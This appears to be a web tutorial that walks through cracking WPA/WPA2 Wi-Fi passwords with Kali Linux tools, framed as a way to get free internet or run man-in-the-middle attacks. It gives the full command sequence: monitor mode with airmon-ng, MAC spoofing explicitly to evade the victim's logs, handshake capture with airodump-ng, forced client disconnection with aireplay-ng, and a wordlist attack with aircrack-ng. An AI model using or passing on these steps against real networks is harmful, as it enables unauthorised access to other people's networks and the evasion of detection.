You are on page 1of 9

HACK WIFI PASSWORD

Hack wifi password, since this is the best method to get free access to internet or perform some
MITM attack on some network if you are an hacker or pentester. In this post I am going to show
you the best and complete technique to hack wifi password that have WPA/WPA2 protection on
them.
Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are the latest security
protocols and security certification programs that are developed by the Wi-Fi Alliance. The
Alliance defined these as there are some serious weaknesses that researchers found in the
previous system, used for the same purpose Wired Equivalent Privacy (WEP). Because of these
weaknesses, WEP encryption is not suitable to protect the wireless networks from hackers as the
attack on wireless networks are getting more and more sophesticated day-by-day. So these two
new protocols were developed.

These two protocols are considered to be very safe but in hacking world nothing is safe, even
they can be cracked. To be able to do so without wasting much time lets jump to the latest
technique to hack wifi password using kali linux 2.

FOLLOW THE STEPS BELOW TO HACK WIFI PASSWORD


(WPA/WPA2 ENCRYPTION)

STEP 1 :
Open the terminal window and type the following command without quotes and press ENTER
key.
airmon-ng check kill
The result is something like this :
STEP 2 :
In the same terminal window type the following command and press ENTER. This cmd will
identify your working wireless interface.

airmon-ng start wlan0

STEP 3 (OPTIONAL) : TO CHANGE YOUR MAC ADDRESS

This step is optional. But I recommend to perform this step as this will change your original mac
address to a fake one and avoid getting caught as these attack may be captured in the log file of
the victim.(only if the victim is a big organization).

Change the mac address of the wlan0mon interface.


ifconfig wlan0mon down
macchanger -m 00:11:22:33:44:55 wlan0mon
ifconfig wlan0mon up

STEP 4 :

Now type the following command in the same terminal window. This command will start the
moniter mode on your wlan0mon interface and you will see all the networks in range. See below

airodump-ng wlan0mon
Now look at the terminal window and here you can see all the wireless access points that are in
your range. Select your target who you want to attack and has a WPA/WPA2 protection
enabled. Wait for 1-2 min. Then, press Ctrl+c to break the program.
You can see something like this :
Note down your targets channel no., bssid and the name of the network in a notepad for later
use.

STEP 5 :
Open a new terminal window and type the following command and hit enter
airodump-ng -c 3 -w wpa2crack bssid ff:ff:ff:ff:ff:ff wlan0mon
*where
-c is the channel of your target.
-w is the file that we want to write. You can give it any name.
bssid is the BSSID of your target.
So replace 3 with your targets channel no, ff:ff:ff:ff:ff:ff with your targets bssid and then hit
enter. Keep this terminal running because we have to capture the handshake. If your system
captured handshake for your target network, it will be notified on right top corner of your current
terminal screen. You may have to wait for at least 5-10 minutes.
If you did not get the handshake after waiting then you may need to try mnually to get the
handshake file. For this you have to follow the steps as mentioned below.

STEP 6: TO GET HANDSHAKE MANUALLY

Handshake is nothing but the packets captured and kept in file with extension .cap. Handshake is
obtained when the client disconnects and then connect again to the router. Si if you are not
getting the handshake file automatically in moniter mode then try to get it manually as
mentioned below.

open a new terminal window. (do not close the previous terminal in which your are in monitor
mode). we have to manually disconnect the clients connected to the targeted router. Once they
get disconnected and try to connect we will get the handshake.

Type the following cmd in new terminal window.

aireplay-ng -0 5 -a ff:ff:ff:ff:ff:ff wlan0mon


The handshake file is in the HOME folder. Location of HOME folder is : PLACES (Left top
corner on Desktop)>> HOME FOLDER.
STEP 7 :
Before we begin the password cracking process , first we need to verify whether or not we have
captured handshake. Therefore we use another tool called Pyrit. So type the following
command and press enter:

pyrit -r handshakefile.cap analyze


STEP 8 :
To crack the WAP/WPA2 password just enter the command below :
aircrack-ng -w wordlist file handshakefile.cap
Lot of wordlist files are available online. In case you dont have one you can download and save
in your computer or else you can also create your own wordlist to hack wifi password using
crunch. Learn how to create your own customized wordlist read this post. Handshakefile.cap
is our capture data file present in Home folder in the above cmd you replace it with your .cap file
in your home folder. Just drag and drop it in the terminal and hit enter. This will now start the
password cracking process and will show the password as plain text as below.

You might also like